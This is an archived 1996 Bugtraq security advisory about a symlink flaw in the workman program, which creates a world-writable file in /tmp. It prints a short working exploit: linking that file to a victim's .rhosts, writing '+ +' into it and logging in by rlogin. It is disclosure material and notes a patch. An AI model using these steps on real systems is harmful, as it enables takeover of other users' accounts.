[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: r00t advisory -- workman vunerability
From: Gregory Hull <gahull () ccs ! neu ! edu>
Date: 1996-08-26 12:21:15
[Download RAW message or body]
r00t advisory [ workman ]
[ Aug 25 1996 ]
-- Synposis
There exists a vunerability in workman that will allow any user to create
and write to files owned by the user who is running workman. Workman creates
a mode 666 file in /tmp and will gladly follow a symbolic link to it's
target.
-- Exploitability
The exploit is absurdly simple:
$ ln -s /home/target_user/.rhosts /tmp/.wm_pid
# wait for target user to run workman
$ echo "+ +" >/home/target_user/.rhosts
$ rlogin -l localhost target_user
-- Fixes ?
The author of workman has been alerted to this problem and a patch is available
from ggal@ccs.neu.edu.
r00t -- http://www.r00t.org
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic